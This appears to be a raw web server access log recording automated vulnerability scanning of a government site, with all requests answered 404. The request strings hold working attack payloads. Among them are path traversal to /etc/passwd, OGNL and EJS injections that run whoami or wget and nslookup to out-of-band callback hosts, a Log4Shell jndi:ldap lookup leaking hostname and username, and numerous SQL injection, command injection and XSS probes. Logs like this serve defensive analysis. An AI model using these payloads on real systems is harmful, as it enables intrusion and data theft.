cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.13.10+(KHTML,+like+Gecko)+Version/17.2.97+Safari/616.13.10 - 404 7 0 202 2024-12-12 11:56:07 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 11:56:47 103.153.214.94 GET /${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:107.0)+Gecko/20100101+Firefox/107.0 - 404 7 0 223 2024-12-12 11:56:50 103.153.214.94 GET /${@java.lang.Runtime@getRuntime().exec("nslookup+ctd67t3bclspkptm3qo0cu1bkdre49xfy.oast.fun")}/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 213 2024-12-12 11:57:24 103.153.214.94 GET /mims/updatecustomer.php customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 236 2024-12-12 11:57:42 103.153.214.94 POST /process/aprocess.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:90.0)+Gecko/20100101+Firefox/90.0 - 404 7 0 33 2024-12-12 11:58:08 103.153.214.94 GET /admin/ajax/pages.php id=(sleep(6)) 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 212 2024-12-12 11:58:57 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.2+Safari/605.1.15 - 404 7 0 231 2024-12-12 12:00:14 103.153.214.94 GET /metadata/v1.json - 8172 - 206.238.196.225 - - 404 7 0 33 2024-12-12 12:01:36 103.153.214.94 GET /videoseyret.php id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.19 - 404 7 0 59 2024-12-12 12:01:36 103.153.214.94 POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 56 2024-12-12 12:01:43 103.153.214.94 POST /admin/asign-single-student-subjects.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.1.2+Safari/605.1.15 - 404 7 0 205 2024-12-12 12:01:45 103.153.214.94 POST /api/content/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 404 7 0 214 2024-12-12 12:01:48 103.153.214.94 GET /2q6JQXjwgPbPpHS2GhzHUOBXatO.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 12:01:52 103.153.214.94 GET /sap/admin/public/default.html - 8172 - 156.251.25.152 - - 404 7 0 254 2024-12-12 12:01:52 103.153.214.94 GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png - 8172 - 156.251.25.152 - - 404 7 0 266 2024-12-12 12:03:17 103.153.214.94 POST /index.php q=result&searchfor=advancesearch 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_1_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.5+Safari/605.1.15 - 404 7 0 47 2024-12-12 12:03:18 103.153.214.94 POST /api/agent/tabs/agentData - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 204 2024-12-12 12:04:48 103.153.214.94 POST /cgi-bin/logo_extra_upload.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 58 2024-12-12 12:04:58 103.153.214.94 GET /logo/2q3kZ5I4kWqChjsA7LMGWHcSuqM.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 81 2024-12-12 12:05:00 103.153.214.94 POST /casmain.xgi - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 45 2024-12-12 12:05:11 103.153.214.94 GET /page id=2q6JQgcuXVOKkdR7VBRbJL5hckb&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://ctd67t3bclspkptm3qo0qtsyh6eoot4da.oast.fun%27);s 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 12:05:12 103.153.214.94 POST /ubus/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.63 - 404 7 0 205 2024-12-12 12:05:59 103.153.214.94 GET /fsms/fsmsh.dll FSMSCommand=${jndi:ldap://${:-967}${:-532}.${hostName}.username.ctcj3jjbclslbev4n7q0cfoag6qh51s4t.oast.live/GpJOO} 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 42 2024-12-12 12:06:49 103.153.214.94 POST /conf_mail.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 213 2024-12-12 12:09:40 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 41 2024-12-12 12:09:43 103.153.214.94 GET /card_scan.php No=123&ReaderNo=`sleep%207`&CardFormatNo=123 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/618.6+(KHTML,+like+Gecko)+Version/17.2+Safari/618.6 - 404 7 0 207 2024-12-12 12:09:44 103.153.214.94 POST /ztp/cgi-bin/handler - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 310 2024-12-12 12:10:09 103.153.214.94 POST /app/options.py - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.11;+rv:78.0)+Gecko/20100101+Firefox/78.0 https://bcvt.kontum.gov.vn:8172/app/login.py 404 7 0 209 2024-12-12 12:10:23 103.153.214.94 GET /fpui/jsp/index.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 12:10:29 103.153.214.94 POST /weaver/weaver.file.FileDownloadForOutDoc - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_6_8)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/28.0.1500.44+Safari/537.36 - 404 7 0 33 2024-12-12 12:10:40 103.153.214.94 POST /weaver/weaver.file.FileDownloadForOutDoc - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.0.3396.99+Safari/537.36 - 404 7 0 46 2024-12-12 12:11:48 103.153.214.94 POST /dfsms/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.24 - 404 7 0 208 2024-12-12 12:11:48 103.153.214.94 POST /ccms/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 12:11:50 103.153.214.94 POST /admin/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 12:11:50 103.153.214.94 GET /dfsms/add-category.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 228 2024-12-12 12:11:50 103.153.214.94 GET /user.php act=login 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1+procedure+analyse(extractvalue(rand(),concat(0x7e,version())),1)--+-";s:2:"id";i:1;} 404 7 0 41 2024-12-12 12:11:50 103.153.214.94 GET /ccms/dashboard.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.81+Safari/537.36 - 404 7 0 199 2024-12-12 12:11:52 103.153.214.94 GET /admin/dashboard.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.1.2+Safari/605.1.15 - 404 7 0 214 2024-12-12 12:11:53 103.153.214.94 GET /live_check.shtml - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5+Safari/605.1.15 - 404 7 0 241 2024-12-12 12:12:03 103.153.214.94 GET /user.php act=login 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT+1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10--+-";s:2:"id";s:11:"-1'+UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca 404 7 0 55 2024-12-12 12:13:17 103.153.214.94 POST /index.php owa_do=base.loginForm&owa_site_id 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 225 2024-12-12 12:13:20 103.153.214.94 GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.26 - 404 7 0 241 2024-12-12 12:13:26 103.153.214.94 POST /index.php owa_do=base.loginForm&owa_site_id 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 12:13:36 103.153.214.94 POST /classes/Master.php f=delete_team 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 200 2024-12-12 12:13:37 103.153.214.94 POST /classes/Master.php f=delete_request 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Mobile/15E148+Safari/604.1 - 404 7 0 206 2024-12-12 12:14:35 103.153.214.94 PUT /v1/agent/check/register - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 221 2024-12-12 12:14:37 103.153.214.94 PUT /v1/agent/check/deregister/2q6JQefxNscUPpjEaUqseQQtcUf - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 198 2024-12-12 12:15:54 103.153.214.94 POST /classes/Master.php f=delete_inquiry 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 202 2024-12-12 12:16:00 103.153.214.94 POST /scgi-bin/platform.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 12:16:02 103.153.214.94 POST /scgi-bin/platform.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 12:16:23 103.153.214.94 GET /pfblockerng/www/index.php - 8172 - 156.251.25.152 - - 404 7 0 203 2024-12-12 12:16:25 103.153.214.94 POST /fileupload/toolsAny - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 212 2024-12-12 12:16:26 103.153.214.94 GET /authenticationendpoint/2q6jqcxcs0upwth46bozeegakzd.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.0+Safari/605.1.15 - 404 7 0 208 2024-12-12 12:22:44 103.153.214.94 GET /cgi/get_param.cgi xml&sys.passwd&sys.su.name 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 212 2024-12-12 12:22:47 103.153.214.94 GET / wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.71+Safari/537.36 - 404 7 0 204 2024-12-12 12:22:47 103.153.214.94 POST /hms/doctor/ - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 214 2024-12-12 12:23:51 103.153.214.94 GET /sysinit.shtml r=52300 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 228 2024-12-12 12:23:51 103.153.214.94 GET /set_safety.shtml r=52300 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 201 2024-12-12 12:23:51 103.153.214.94 GET /backupsettings.dat - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 12:24:50 103.153.214.94 POST /flexnet/logon.do - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 https://bcvt.kontum.gov.vn:8172/flexnet/logon.do 404 7 0 91 2024-12-12 12:25:02 103.153.214.94 POST /templates/default/html/windows/right.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 198 2024-12-12 12:25:02 103.153.214.94 GET /ws-api/v2/users/me/details token=02 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 208 2024-12-12 12:25:35 103.153.214.94 POST /fpc/login/ - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/fpc/app/login 404 7 0 84 2024-12-12 12:26:20 103.153.214.94 POST /admin/ajax.php action=login 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 221 2024-12-12 12:26:21 103.153.214.94 POST /admin/ajax.php action=login 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 227 2024-12-12 12:26:24 103.153.214.94 GET /booking.php car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 219 2024-12-12 12:26:24 103.153.214.94 GET /admin/index.php page=home 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 221 2024-12-12 12:26:37 103.153.214.94 GET /delsnap.pl name=|id 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.1.2+Safari/605.1.15 - 404 7 0 197 2024-12-12 12:26:53 103.153.214.94 POST /hms/admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.5.23 - 404 7 0 205 2024-12-12 12:28:12 103.153.214.94 POST /admin/ajax.php action=login 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 230 2024-12-12 12:28:16 103.153.214.94 GET /admin/view_car.php id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 404 7 0 225 2024-12-12 12:28:52 103.153.214.94 GET /Visitor/bin/WebStrings.srf file&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.63 - 404 7 0 87 2024-12-12 12:29:08 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.17+(KHTML,+like+Gecko)+Version/17.3.75+Safari/616.17 - 404 7 0 82 2024-12-12 12:29:12 103.153.214.94 POST /admin/ajax.php action=login 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 202 2024-12-12 12:29:12 103.153.214.94 POST /admin/ajax.php action=login 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 12:29:16 103.153.214.94 GET /admin/manage_user.php id=-1%20union%20select%201,md5(999999999),3,4,5--+ 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.71+Safari/537.36 - 404 7 0 209 2024-12-12 12:29:16 103.153.214.94 POST /xmlrpc - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.17 - 404 7 0 225 2024-12-12 12:29:23 103.153.214.94 GET /admin/manage_booking.php id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11--+ 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 219 2024-12-12 12:30:15 103.153.214.94 POST /Org/service/Service.asmx/GetUserByEmployeeCode - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 92 2024-12-12 12:31:37 103.153.214.94 POST /api/system/sessions - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.21 https://bcvt.kontum.gov.vn:8172 404 7 0 86 2024-12-12 12:32:38 103.153.214.94 GET /blog-search search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 308 2024-12-12 12:33:10 103.153.214.94 POST /webapi/auth - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 218 2024-12-12 12:38:33 103.153.214.94 POST /api/v2/open/rowsInfo - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 12:39:02 103.153.214.94 GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 12:39:02 103.153.214.94 GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 206 2024-12-12 12:39:02 103.153.214.94 POST /service/extension/backup/mboximport account-name=admin&ow=2&no-switch=1&append=1 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/64.0.3282.140+Safari/537.36+Edge/18.17763 - 404 7 0 209 2024-12-12 12:39:02 103.153.214.94 POST /service/extension/backup/mboximport account-name=admin&account-status=1&ow=cmd 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_0_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.88+Safari/537.36 - 404 7 0 206 2024-12-12 12:39:11 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 197 2024-12-12 12:39:11 103.153.214.94 GET /cgi-bin/popen.cgi command=type%20C://Windows/win.ini&v=0.1303033443137912 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:96.0)+Gecko/20100101+Firefox/96.0 - 404 7 0 200 2024-12-12 12:39:11 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 212 2024-12-12 12:39:11 103.153.214.94 GET /cgi-bin/popen.cgi command=cat%20/etc/passwd&v=0.1303033443137912 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 12:39:13 103.153.214.94 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Tokai/21.1.294403+Version/17.2+Safari/605.1.15 - 404 7 0 83 2024-12-12 12:39:15 103.153.214.94 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 83 2024-12-12 12:40:15 103.153.214.94 PUT /v1/agent/service/register - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 93 2024-12-12 12:40:16 103.153.214.94 POST /v2/query - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13_5_3;+en-US)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.4+Safari/605.1.15 - 404 7 0 101 2024-12-12 12:40:20 103.153.214.94 GET /api/subscriber - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 219 2024-12-12 12:40:22 103.153.214.94 POST /hms/user-login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.7.15 - 404 7 0 230 2024-12-12 12:41:22 103.153.214.94 POST /v1/query - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 87 2024-12-12 12:42:03 103.153.214.94 POST /servlets/OmaDsServlet - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 199 2024-12-12 12:43:19 103.153.214.94 GET /login.zul - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 12:43:27 103.153.214.94 POST /configWizard/keyUpload.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 221 2024-12-12 12:43:38 103.153.214.94 POST /ajax/openvpn/del_ovpncfg.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 203 2024-12-12 12:43:42 103.153.214.94 POST /controller/ping.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/controller/ping.php 404 7 0 223 2024-12-12 12:44:52 103.153.214.94 POST /login/dologin - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 96 2024-12-12 12:44:56 103.153.214.94 POST /task/loginValidation.php - 8172 - 156.251.25.152 